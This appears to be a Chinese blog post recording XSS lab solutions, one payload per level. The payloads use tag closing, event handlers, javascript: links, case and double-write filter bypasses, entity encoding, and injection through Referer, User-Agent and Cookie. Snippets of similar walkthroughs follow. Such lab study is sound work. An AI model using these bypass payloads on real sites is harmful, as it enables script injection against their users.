XSS挑战关卡

已于 2022-03-09 20:00:35 修改
阅读量651 收藏
点赞数
文章标签: xss webview php
于 2022-03-09 08:49:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CC_FL/article/details/123368035
版权

 

level1 
<script>alert(1)</script>

level2(闭合标签)
"><script>alert(1)</script>

level3(单引号闭合)
'οnmοusemοve='alert(1)

level4(双引号闭合)
“οnmοusemοve=”alert(1)

level5(伪协议)
"><a href=javascript:alert(1)>

level6(大小写)
"><Script>alert(1)<Script>

level7(双写)
 "><SCRSCRIPTIPT>ALERT(1)</SCRSCRIPTIPT>

level8(url)
JAVASC&#x72;IPT:ALERT`1`

level9(url拼接)
javascrip&#x74;:alert(1)//http://xxx.com  

level10(查看源码,t_sort参数)
t_sort=" type="text" onclick = "alert(1)

level11(referer请求)
referer " type="text" onclick = "alert(1)

level12(user-agent请求)
user-agent " type="text" onclick = "alert(1)

level13 (cookie请求 user参数)
cookie user=" type="text" onclick = "alert(1)

level15(查看源码 AngularJS文件包含)
src='level1.php?name=<a href=javascript:alert(1)>'

level16(查看源码空格被过滤,可以找空格代替符进行拼接绕过)
<img%0Dsrc=1%0Dοnerrοr=alert(1)>

CC_FL
关注
xss闯关记录 1-10超详细
weixin_44717303的博客
03-31 789
xss挑战过关教程 挑战关卡准备环境第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关 准备环境 首先需要一个 xss通关挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑 第一关 没有任何保护随便一条脚本语句均可 <a href=javascript:/00/,alert(%22M%22)>M</a> 第二关 "> <a href=javascript:/00/,alert(%22M%22)>M</a>// 对比
xss挑战心得(简单易懂)
xtx4506的博客
03-09 1992
作为一个呢刚刚学习web渗透的小菜鸟,一开始也是在老师的带领下接触到了xss挑战,个人感觉是很经典的题目嗷,以后就会在这里进行再学习了,这两天挑战也是记录了不少,所以希望可以记录下来,菜鸟的自我记录,大神勿喷噢 ---------------------------------------------------------------------------------------------------------------------- level 1 相信不少人和我一样看到...
XSS小游戏【1-13关】
XiaoYeZhu_1314的博客
10-30 646
第一关 Payload:<script>alert(1)</script> 第二关 Payload:keyword=<script>alert(1)</script> 发现没有成功,F12发现需要闭合input 标签 再次输入payload:aaa"><svg onload=alert(1)> //当这个输入被插入到网页中时,浏览器会将其解析为HTML代码,并执行其中的JavaScript代码 第三
XSS入门闯关详解1-5关
New_Ss_的博客
01-08 566
这里给大家推荐一个的免费的平台,https://mituan.zone/#/login 不需要自己安装靶机环境,直接在网站上用就可,极其方便。 有sql注入,xss,dvwa之类的,直接进入正题: 第一关 没有任何的幺蛾子,最简单的<script>alert(1)</script>即可。 第二关 尝试经典代码失败后查看源代码,发现输入的代码被闭合了。 可以通过">来闭合前边value标签,这里我输入的是">111发现111可以被执行呼出来,所以在第一关的代码前边加上
XSS闯关小游戏
weixin_42728957的博客
12-07 3726
最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: level1 登录页面: 查看代码 <?php ini_set("display_errors", 0); $str = $_GET["name"]; ech
XSS-labs1-20关通过手册
网络空间安全学习
09-21 2998
ng-include指令一般用于包含外部HTML文件,ng-include属性的值可以是一个表达式,返回一个文件名,但是默认情况下,包含的文件需要包含在同一域名下,也就是要调用同一域名下的其他网页。通过代码发现,本关卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。被HTML实体编码了,成了实体字符。
xss game挑战笔记.pdf
02-11
#### 三、挑战关卡详解 ##### 1. 第一关 - 基础反射型XSS - **目标**:利用反射型XSS攻击,让受害者点击一个链接后弹出警告框。 - **思路**:通过构造带有恶意脚本的URL,使得受害者点击后执行弹窗脚本。 - **解决...
网络安全XSS挑战笔记:从基础到实战的跨站脚本攻击绕过技巧与编码解析
最新发布
04-20
内容概要:本文档是作者在参与XSS挑战过程中总结的经验和技巧。文档首先介绍了XSS的基础知识,包括HTML和JavaScript编码的区别及其在不同场景下的应用,以及浏览器解析代码的顺序。接着详细描述了从第一关到第十九关...
xss挑战
03-17
- OverTheWire的Natas关卡包含多层XSS挑战 ```javascript // 示例:利用图片标签触发XSS (1)> ``` #### 三、实战演练方法 1. **搭建本地靶场** 使用DVWA(Damn Vulnerable Web App)或Vulnhub中的XSS专项...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master`很可能包含一系列逐步增加难度的关卡,每个关卡可能模拟真实世界中的XSS漏洞场景。玩家需要找出并利用这些漏洞,提交正确的payload(注入的脚本)以过关。这样的练习可以帮助测试人员理解XSS攻击的...
XSS靶场通关详解(1-18关)
cz020907020808的博客
06-07 2485
家人们,因为xss靶场比较简单,有些地方说的比较笼统,过关很容易,只需要多尝试就可以,但是学好就难了!
XSS挑战赛(xsslabs)11~16关通关解析
黄乔国PHP
03-07 778
总的来说xsslabs还是很有代表意义的,里面提供了很多绕过和防御XSS的思路。所谓知己知彼在这里面体现的淋漓尽致了。
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 4330
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
XSS-Game 通关教程,XSS-Game level1-18XSS靶场通关教程
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
XSS-Game level 8
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame8XSS-Game第八关过滤的很严 , 只能编码绕过了
XSS漏洞靶场闯关
m0_65858385的博客
08-17 1281
boomer=<a id=ok href="javascript:alert(1337)">这里的意思是我们a这个标签,id=ok使得让后面href中的代码放在ok中2秒后自动执行,但这里我们使用的javascript没有任何变化是这个不在白名单内,我们就可以使用这个框架中的白名单中的一些协议,我在github中查到的有mailto、tel、cid、sms等……在action这里存在一个尾协议的事情,。",这里jeff=后面跟的可以为其他的都没关系,主要是后面要进行一个闭合执行我们的alert(1337)
xss前十二关靶场练习
weixin_62870380的博客
09-02 1018
xss漏洞原理,分类,以及xss漏洞靶场前十二关通关。
xss挑战之旅Level8-12)
m0_52701599的博客
03-12 488
xss挑战之旅Level8-12)
XSS-labs 1-13关通关攻略
qq_57861415的博客
01-31 1790
xsslabs 1-13关攻略
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值